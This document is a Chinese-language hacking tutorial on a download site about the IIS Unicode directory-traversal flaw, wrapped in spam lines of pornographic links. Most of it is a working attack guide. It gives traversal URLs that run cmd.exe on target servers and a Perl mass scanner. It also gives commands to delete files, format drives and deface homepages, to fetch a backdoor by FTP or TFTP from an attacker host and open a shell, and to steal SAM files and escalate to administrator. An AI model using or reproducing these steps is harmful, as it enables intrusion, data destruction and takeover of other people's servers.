在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美

當前位置:雨林木風下載站 > 安全殺毒教程 > 詳細頁面

UNICODE漏洞的原理

UNICODE漏洞的原理

更新時間:2025-10-13 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據...
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。

一、UNICODE漏洞的原理 
此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 
臺灣繁體中文也同樣存在這樣的漏洞。 
中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中 
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ 
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘ 
在NT4中/編碼為%c1%9c 
在英文版里: 
WIN2000英文版%c0%af 
但從國外某些站點得來的資料顯示,還有以下的編碼可以實現對該漏洞的檢測,具體情況本人未做詳細的證實: 
%c1%pc 
%c0%9v 
%c0%qf 
%c1%8s 
%e0%80%af 
%f0%80%80%af 
%fc%80%80%80%80%af 
或許是什么日文版、韓文版之類,win2000 Terminal版有興趣的朋友可以試試。 
二、UNICODE漏洞的檢測 
以下均以中文版WIN2K為例,如果是其他NT版本,按上面所述的編碼替換以下代碼中的%c1%1c 
最簡單的檢測方法: 
比如說有一IP地址為X.X.X.X的WIN2K主機,我們可以在地址欄輸入 
x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
如果存在此漏洞的話,我們便可以看到以下的內容:(例子假設SCRIPTS目錄里無文件) 
Directory of C:\inetpub\scripts 
2000-09-28 15:49 〈DIR〉 . 
2000-09-28 15:49 〈DIR〉 .. 

這是我們在很多經驗交談中常看到大家使用的方法,實際上我們也可以改為這樣 
127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir 
即r=c 這個字母的取代,在本文發表之前,網絡里沒有介紹過,關于r這字母可以等效于c,我們可以通過cmd/?可以得到解釋。 

當然,如果目標主機的管理員把該目錄刪除掉,我們就無法看到了,但是還有以下的目錄是同樣可以用來測試的。 

http://x.x.x.x/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
運行后,我們可以看到 
Directory of c:\program files\common files\system\msadc 
2000-08-06 19:16 

2000-08-06 19:16 
.. 
(以下內容略) 
19 File(s) 1,233,840 bytes 
2 Dir(s) 6,290,644,992 bytes free 

如果漏洞和目錄同時存在的話,你就可以在WEB頁上看到相對應的目錄里的一切內容。這僅是對單一目標主機的漏洞檢測,如果想對某一IP段上的NT主機做UNICODE漏洞的檢測,我們就需要使用類似以下的掃描軟件。 
以下的源碼是外國黑客寫的,當然就只掃描英文版的NT,要掃描中文版的,需要做相應的修改。 
#!/usr/bin/perl 
#Root Shell Hackers 
#piffy 
#this is a quick scanner i threw together while 
supposedly doing homework in my room. 
#it will go through a list of sites and check if it 
gives a directory listing for the new IIS hole 
#it checks for both %c0%af and %c1%9c 
#perhaps a public script to do some evil stuff with this 
exploit later... h0h0h0 
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy 
for researching the hole =] 
use strict; 
use LWP::UserAgent; 
use HTTP::Request; 
use HTTP::Response; 
my $def = new LWP::UserAgent; 
my @host; 
print "root shell hackers\n"; 
print "iis cmd hole scanner\n"; 
print "coded by piffy\n"; 
print "\nWhat file contains the hosts: "; 
chop (my $hosts=); 
open(IN, $hosts) ││ die "\nCould not open $hosts: $!"; 
while () 

$host[$a] = $_; 
chomp $host[$a]; 
$a++; 
$b++; 

close(IN); 
$a = 0; 
print "ph34r, scan started"; 
while ($a < $b) 

my 
$url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
"; 
my $request = new HTTP::Request(‘GET‘, $url); 
my $response = $def->request($request); 
if ($response->is_success) { 
print $response->content; 
open(OUT, ">>scaniis.log"); 
print OUT "\n$host[$a] : $response->content"; 
-close OUT; 
} else { 
print $response->error_as_HTML; 

&second() 


sub second() { 
my 
$url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
"; 
my $request = new HTTP::Request(‘GET‘, $url2); 
my $response = $def->request($request); 
if ($response->is_success) { 
print $response->content; 
open(OUT, ">>scaniis.log"); 
print OUT "\n$host[$a] : $response->content"; 
-close OUT; 
} else { 
print $response->error_as_HTML; 

$a++; 



—————————————————————————————————— 
以上的pl程序你可以在本機運行(當然需要安裝PERL),也可以在遠程的 
服務器上運行。 

三、UNICODE編碼漏洞簡單利用的命令 
一般情況下我們用 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 

看到的目錄是空的:(例如) 
Directory of C:\inetpub\scripts 
2000-09-28 15:49 〈DIR〉 . 
2000-09-28 15:49 〈DIR〉 .. 
如果我們這樣輸入的話: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 

就可以看到該主機c:盤的目錄和文件了。 
其他的一些簡單的用法: 
1、顯示文件內容 
如果想顯示里面的其中一個badboy.txt文本文件,我們可以這樣輸入(htm,html,asp,bat等文件都是一樣的) 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\badboy.txt 

那么該文件的內容就可以通過IE顯示出來。 
2、建立文件夾的命令 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:\badboy 

運行后我們可以看到返回這樣的結果: 
CGI Error 
The specified CGI application misbehaved by not 
returning a complete 
set of HTTP headers. The headers it did return are: 
英文意思是 
CGI錯誤 
具體的CGI申請有誤,不能返回完整的HTTP標題,返回的標題為: 
3、刪除空的文件夾命令: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\badboy 

返回信息同上 
4、刪除文件的命令: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\badboy.txt 

返回信息同上 
5、copy文件且改名的命令: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\badboy.txt 
bad.txt 
返回信息: 
CGI Error 
The specified CGI application misbehaved by not 
returning a complete 
set of HTTP headers. The headers it did return are: 
1 file(s) copied. 
6、顯示目標主機當前的環境變量 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set 

返回的信息: 
CGI Error 
The specified CGI application misbehaved by not 
returning a complete 
set of HTTP headers. The headers it did return are: 
ALLUSERSPROFILE=E:\Documents and Settings\All Users 
AUTH_TYPE=Negotiate 
AUTH_USER=BADBOYCL-DQQZQQ\badboy 
CASL_BASEDIR_ENV=E:\scan\CyberCop Scanner\casl 
CommonProgramFiles=E:\Program Files\Common Files 
COMPUTERNAME=BADBOYCL-DQQZQQ 
ComSpec=E:\WINNT\system32\cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=*/* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST=127.0.0.1 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; 
Windows NT 5.0) 
HTTP_AUTHORIZATION=Negotiate 
TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADAAMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAE 
IATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAYQBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUs 
BqOAQ3/+AfwqHKj8Q2vzSAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT== 

HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTPS=off 
INSTANCE_I 
7、把某個文件夾內的全部文件一次性COPY到另外的文件夾去 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopy 
c:\badboy c:\inetpub\wwwroot 
返回的信息: 
CGI Error 
The specified CGI application misbehaved by not 
returning a complete 
set of HTTP headers. The headers it did return are: 
我們查看c:\inetpub\wwwroot文件夾,結果所有c:\badboy內的都拷貝到該目錄里了 
8、把某個文件夾剪貼到指定的目錄去 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+move 
c:\badboy c:\inetpub\wwwroot 
呵呵,還是可以做到的,時間的長短要看文件的多少了 
9、顯示某一路徑下相同文件類型的文件內容 

http://127.0.0.1/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\*.ht* 

完全顯示出來呀 
同樣,還有很多命令可以執行,大家可以試試,不過有些時間會很久,有些是不能執行的。 
解釋+號,在這里+等于空格鍵,當然你也可以用空格鍵,用空格鍵運行后會轉換為%20 和%c1%1c=/是同一道理的。 
對于名字超過8個字母的文件夾,如果我們想看里面的內容時就有點不同了比如說我們想看目標主機Program Files文件夾里面的內容時,應該這樣輸入 
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\progra~1 
這里就不能用+或者%20來代替program與files間的空格。 
至于對aa bb這樣中間帶有空格的文件夾怎么看,目前我還不知道,如果誰知道可以寫出來。 

在攻略2里我提到 
至于對aa bb這樣中間帶有空格的文件夾怎么看,目前我還不知道,如果誰知道可以寫出來。 
通過對dos的8.3規則的補習,終于弄明白怎么看aa bb文件夾了方法就是以下 
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~1aa bb=aabb~1 
如果同目錄下還有aab b文件夾,就用這樣的代碼看aab b文件夾里的內容 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~2依此類推。 

四、如何簡單地修改目標主機的web頁面 
一般情況下,我們要修改目標主機的web文件,常用到的方法是利用echo回顯、管道工具> >>。 
先復習一下這些命令和管道工具的功能。 
D:\>echo/? 
顯示信息,或將命令響應打開或關上。 
ECHO [ON │ OFF] 
ECHO [message] 
僅鍵入 ECHO 而不加參數,可以顯示當前的 ECHO 設置。 

管道工具> >>的功能 
"> >>" 是將命令產生的輸出重新定向,比如寫到某個文件或輸出到打印機中.>>產生的內容將追加進文件中,>則將原文件內容覆蓋。 

再看看cmd/?里面的部分內容: 
請注意,如果字符串有引號,可以接受用命令分隔符 ‘&&‘ 隔開的多個命令。并且,由于兼容原因,/X 與 /E:ON 相同,/Y 與/E:OFF 相同,并且 /R 與 /C 相同。忽略任何其它命令選項。 
如果指定了 /C 或 /K,命令選項后的命令行其余部分將作為命令行處理;在這種情況下,會使用下列邏輯處理引號字符("): 
1. 如果符合下列所有條件,那么在命令行上的引號字符將被 
保留: 
- 不帶 /S 命令選項 
- 整整兩個引號字符 
- 在兩個引號字符之間沒有特殊字符,特殊字符為下列中的 
一個: <>()@^│ 
- 在兩個引號字符之間有至少一個空白字符 
- 在兩個引號字符之間有至少一個可執行文件的名稱。 
2. 否則,老辦法是,看第一個字符是否是一個引號字符,如果是,舍去開頭的字符并刪除命令行上 的最后一個引號字符,保留最后一個引號字符之后的文字。 

從以上可以得到什么啟示? 
我們知道IIS加載程序檢測到有CMD.EXE或者COMMAND.COM串就要檢測特殊字符“&│(,;%<>”,如果發現有這些字符就會返回500錯誤,所以不能直接使用CMD.EEX加管道符等。 
通過 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+badboy+>; 
c:\badboy.txt 
我們可以看到提示 
HTTP 500 - 內部服務器錯誤 
Internet Explorer 
經過反復測試,并從上面cmd內容的提示,我們可以會發現"引號字符是可以利用的,中聯綠盟的yuange(袁哥)發布過關于這字符的公告,我想也許也是從上面的cmd/?信息中得到提示的,(純屬個人猜想,如果不是,請yuange不要見怪)。 

我們要得到echo與>的結合使用,可以這樣操作。 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+badboy+> 
c:\badboy.txt 
注意,與開始的命令的區別只在于cmd后面多了個"字符。 
運行后我們可以看到返回這樣的結果: 
CGI Error 
The specified CGI application misbehaved by not 
returning a complete 
set of HTTP headers. The headers it did return are: 
英文意思是 
CGI錯誤 
具體的CGI申請有誤,不能返回完整的HTTP標題,返回的標題為: 

實際上,我們已經把badboy寫入到c:\badboy.txt文件里了。 

利用這樣的方法我們可以建立.bat .txt .asp .htm .html 等文件,這對于一個存在這漏洞的網站可以說是致命打擊的開始,尤其是能寫.bat文件如果我們在autoexe.bat里面加入format del等命令時,你想結果會如何?? 

回到修改網站頁面的問題來。 
比如說想修改c:\inetpub\wwwroot\default.asp 
我們就可以這樣在地址欄輸入: 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+your+site+has+unicode+bug+> 
c:\inetpub\wwwroot\default.asp 
那么再看他的首頁時,已經被修改為 
your site has unicode bug 

事情就那么簡單,任何一個普通人都可以通過地址欄對存在該漏洞的目標主機做最簡單的HACK行為。 
當然,如果為了方便輸入,我們可以把cmd.exe改名為其他名字的文件,比如說c.exe 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\c.exe 
以后使用就可以直接 
http://x.x.x.x/scripts/c.exe?/c+echo+badboy+>; 
c:\badboy.txt 
、bat命令法 
很多文章都沒有介紹如何在unicode編碼漏洞中如何利用BAT命令,實際上運用批處理,可以執行很多在地址欄里無法執行的命令,并且可以簡化你輸入的過程。 
例子: 
baddel.bat 
del /f /s /q c:\files\*.* 
rd c:\files 
我們可以這樣建立和執行 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+del%20/f%20/s%20/q%20c:\files\*.*>baddel.bat 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rd%20c:\files>>baddel.bat 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+baddel 
結果C盤里的files目錄和文件都被刪除了。 
如果我們把批處理改為format d:/q之類的話,那么D盤就被格式化了。 
同樣,你可以運用批處理進行更多的攻擊,那你就需要好好復習DOS的命令及應用了。 
注意:上面第三行的代碼就是執行baddel.bat,這里.bat不要輸入 

2、attrib的運用 
用這命令查文件屬性和修改文件的屬性 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?c:\inetpub\wwwroot\index.htm 
運行后,我們可以看到index.htm的文件屬性,往往有時我們無法修改這文件,是因為這文件設為只讀。 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?%20%2br%20%2bh%20d:\inetpub\wwwroot\index.htm 
運行后,我們可以把index.htm文件設為只讀、隱藏。如果我們把某個后門程序隱藏起來,并且管理沒有設置所有文件可見,那么是不是很方便上傳的東西不被管理員發現呢? 
注意這里%2b等于+ 

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?%20-r%20-h%20d:\inetpub\wwwroot\index.htm 
運行后解除文件的屬性。 

3、ftp的運用 
有時我們需要從一個你有權限的FTP主機把你想用到的一些文件上傳到目標主機去,象ncx99.exe之類的,當然你要把這些文件放在你的空間先。 
……/cmd.exe?/c+echo+open+*.*.*.*>badboy.txt 
……/cmd.exe?/c+echo+user>>badboy.txt 
……/cmd.exe?/c+echo+pass>>badboy.txt 
……/cmd.exe?/c+echo+get+ncx99.exe>>badboy.txt 
……/cmd.exe?/c+echo+bye>>badboy.txt 
然后運行 
……/cmd".exe?/c+ftp+-s:badboy.txt 
……/cmd.exe?/c+del badboy.txt 
完成以上內容后ncx99.exe已經在inetpub/scripts目錄里了 
剩下的就看你怎么用軟件了 

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\ncx99.exe 
還等什么快telnet x.x.x.x 99 
你還有什么垃圾軟件,盡管放上去吧。 

六、unicode編碼漏洞提高篇(續) 
4、TFTP運用 
關于TFTP的運用我們在全攻略-5里面的工具介紹中介紹過,那工具可以在WIN9X或者NT、WIN2K下執行,前提條件是需要你在本機上安裝PERL服務器程序,這對于一般的愛好者來說稍微有點困難。實際上如果你是使用NT系統或者你擁有一臺NT肉機的話,就可以使用WINNT\SYSTEM32下的TFTP.EXE這個軟件了。 
tftp/? 
Transfers files to and from a remote computer running 
the TFTP service. 
TFTP [-i] host [GET │ PUT] source [destination] 
-i Specifies binary image transfer mode (also called 
octet). In binary image mode the file is moved 
literally, byte by byte. Use this mode when 
transferring binary files. 
host Specifies the local or remote host. 
GET Transfers the file destination on the remote host to 
the file source on the local host. 
PUT Transfers the file source on the local host to 
the file destination on the remote host. 
source Specifies the file to transfer. 
destination Specifies where to transfer the file. 
幫助是英文的,自己翻譯吧。 
在UNICODE上的命令代碼: 

http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe 
你放什么軟件都可以,我不喜歡木馬,所以我也不再介紹你該傳什么木馬上去,然后怎么啟動,那樣走題太遠了。 

5、ASP相關問題 
一般情況下,NT機器絕大多數都會使用到ASP寫的WEB程序和SQL數據庫。 
大家都知道ASP代碼的泄露意味著你辛辛苦苦寫的ASP源碼被人無償獲得,同時你的站點也很容易遭到黑手。ASP代碼泄露的漏洞很多種,同樣,在UNICODE編碼漏洞下,你的ASP源碼同樣可以極易被人獲取。 
假設你的index.asp是一個很好的程序,那么,入侵者可以通過type命令查看你的文件。 
../cmd.exe?/type c:\inetpub\wwwroot\index.asp 
或者通過copy命令 
../cmd.exe?/copy c:\inetpub\wwwroot\index.asp 
c:\inetpub\wwwroot\index.txt 
然后直接下載你的源碼,通過分析,找到你的數據庫文件。 
如果你是使用SQL服務來做數據庫的,同樣,入侵者可以通過查看你的ASP和global.asa源碼,通過分析,找到你的用戶名和密碼,然后通過SQL遠程管理客戶端進行攻擊。那么,你的商業秘密和網站的資料,還有什么安全可言呢? 

入侵者還可以在你的主機里上傳一個ASP后門程序(ASE,應該聽說過和用過吧)并隱藏起來,即使你以后補掉了UNICODE漏洞,入侵仍可在他的ASP后門程序在你未發現之前,查看、修改、刪除你主機上的WEB文件。 

6、獲得超級用戶權限 
可以通過下在你的SAM文件,利用一些黑客軟件(如l0phtcrack)暴力破解。 
也可以利用前面介紹的上傳方法把gasys.dll、cmd.exe和getadmin.exe到目標主機,然后通過一些軟件或者方法獲得目標主機的計算機名,再利用getadmin.exe把iuser_計算機 升級為Administrator/scripts/getadmin.exe?IUSR_計算機名那還有什么事不可以做呢?已經等于完全控制這臺主機了。
網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美
  • <li id="86scu"><menu id="86scu"></menu></li>
    <li id="86scu"></li>
    <button id="86scu"></button>
  • <s id="86scu"></s><button id="86scu"><menu id="86scu"></menu></button>
  • 黄色a级片免费| 一本久道高清无码视频| 99sesese| 欧美女同在线观看| 青少年xxxxx性开放hg| 99久re热视频精品98| 国产素人在线观看| 久久精品99国产| 欧美丰满熟妇bbbbbb百度| 日韩一级免费在线观看| 91视频免费版污| 国产91porn| 九热视频在线观看| 91丨porny丨探花| 日本精品久久久久中文字幕| 欧美日韩一区二区在线免费观看| 911av视频| 免费在线观看毛片网站| 日韩成人手机在线| 国产午夜伦鲁鲁| 三级a三级三级三级a十八发禁止| 欧美在线观看成人| 激情五月五月婷婷| 熟女视频一区二区三区| 人妻av中文系列| 五月天男人天堂| 欧洲美女亚洲激情| 黄色片免费网址| 在线观看高清免费视频| 黄色永久免费网站| 亚洲一区二区在线视频观看| 日韩av三级在线| 亚洲这里只有精品| 91色国产在线| 无码人妻丰满熟妇区五十路百度| 91九色在线观看视频| 热99这里只有精品| 污污网站免费观看| 国产精品第157页| 国产精品沙发午睡系列| 亚洲成人福利在线观看| 成人一级生活片| 簧片在线免费看| 色综合天天色综合| 国产情侣第一页| 日韩一级片免费视频| 一本色道久久亚洲综合精品蜜桃 | www.好吊操| 精品成在人线av无码免费看| 亚洲第一色av| 能看的毛片网站| 视频区 图片区 小说区| 欧美大片在线播放| 九九视频精品在线观看| 国产精品久久国产| 欧美日韩一道本| 欧美性猛交xxx乱久交| 三日本三级少妇三级99| 欧美污视频网站| 国产肥臀一区二区福利视频| xxxx一级片| 久久久久久综合网| 成人精品小视频| 好色先生视频污| 99re在线视频免费观看| 少妇久久久久久被弄到高潮| 国产亚洲精品久久久久久久| 99在线精品免费视频| 日韩在线第三页| 国模吧无码一区二区三区| 国产 日韩 亚洲 欧美| 中文字幕成人在线视频| 欧美在线aaa| 成人一区二区三| 一区二区三区网址| 男女视频在线观看网站| 国产91porn| 国产成人永久免费视频| 最新av网址在线观看| 久久久久久人妻一区二区三区| 九色porny自拍| 日本男人操女人| 免费看欧美黑人毛片| 黑人糟蹋人妻hd中文字幕| 18禁免费无码无遮挡不卡网站| 超碰97人人射妻| 欧美中文字幕在线观看视频| 免费日韩在线观看| 久久久无码中文字幕久...| 久久精品视频91| 国产熟人av一二三区| 国产成人av影视| 日本欧美视频在线观看| 免费网站在线观看视频| 97xxxxx| 91最新在线观看| 午夜精品久久久久久久99热影院| 亚洲熟妇无码一区二区三区导航| 韩国黄色一级大片| 欧美a v在线播放| 精品少妇无遮挡毛片| 黄色成人在线看| 亚洲激情在线看| 毛片毛片毛片毛片毛| aa在线观看视频| 色网站在线视频| 丁香六月激情网| 亚洲色图偷拍视频| 日韩精品一区二区三区久久| www.xxx亚洲| av电影一区二区三区| 国产在线观看中文字幕| 精品日韩久久久| 亚洲一二三av| 一级淫片在线观看| 中文av字幕在线观看| www.亚洲天堂网| 91免费视频网站在线观看| 日韩手机在线观看视频| 131美女爱做视频| 狠狠爱免费视频| 国产福利视频在线播放| 五月花丁香婷婷| 国产日韩一区二区在线| 四季av一区二区三区| 国产精品网站免费| 国产网站免费在线观看| 大陆极品少妇内射aaaaa| 欧美一级裸体视频| 校园春色 亚洲色图| 黄色大片中文字幕| 国产亚洲综合视频| 国产麻花豆剧传媒精品mv在线| 免费看啪啪网站| 成人性生交免费看| 久久综合久久网| 五月花丁香婷婷| 成人免费观看cn| 中文字幕无码精品亚洲35| 欧美国产综合在线| 妓院一钑片免看黄大片| 999久久欧美人妻一区二区| 免费一级淫片aaa片毛片a级| chinese少妇国语对白| 亚洲综合在线一区二区| 不要播放器的av网站| 成人黄色片免费| 久久久九九九热| 俄罗斯av网站| 最近免费观看高清韩国日本大全| 国产又黄又猛视频| 成人午夜视频在线观看免费| 可以免费观看av毛片| 欧洲精品一区二区三区久久| 北条麻妃在线观看| 男女高潮又爽又黄又无遮挡| 91aaa精品| 国产成人精品视频ⅴa片软件竹菊| 国产奶头好大揉着好爽视频| 各处沟厕大尺度偷拍女厕嘘嘘| 手机成人av在线| 亚洲精品视频三区| 一区二区三区 日韩| 精品国产一区二区三区无码| 亚洲最大成人在线观看| 蜜臀精品一区二区| 激情成人开心网| 成人性做爰片免费视频| 少妇一级淫免费播放| 天天做天天干天天操| 五月婷婷深爱五月| 性欧美在线视频| 黄色一级大片在线观看| 美女一区二区三区视频| 国产av麻豆mag剧集| 欧美在线观看www| 国产精品三级一区二区| heyzo亚洲| 自拍偷拍视频在线| 警花观音坐莲激情销魂小说| 最近免费中文字幕中文高清百度| 日日噜噜夜夜狠狠| 黄色影院一级片| 免费高清一区二区三区| 爱情岛论坛vip永久入口| 久久综合亚洲精品| 中国丰满人妻videoshd| 午夜免费看毛片| 激情图片qvod| 男女视频网站在线观看| 免费在线精品视频| 亚洲综合激情视频| 激情视频综合网| 国内精品在线观看视频| 中文字幕在线观看日| 日韩精品手机在线观看| 免费看黄在线看| 在线观看免费的av| www.av片| 日韩av卡一卡二|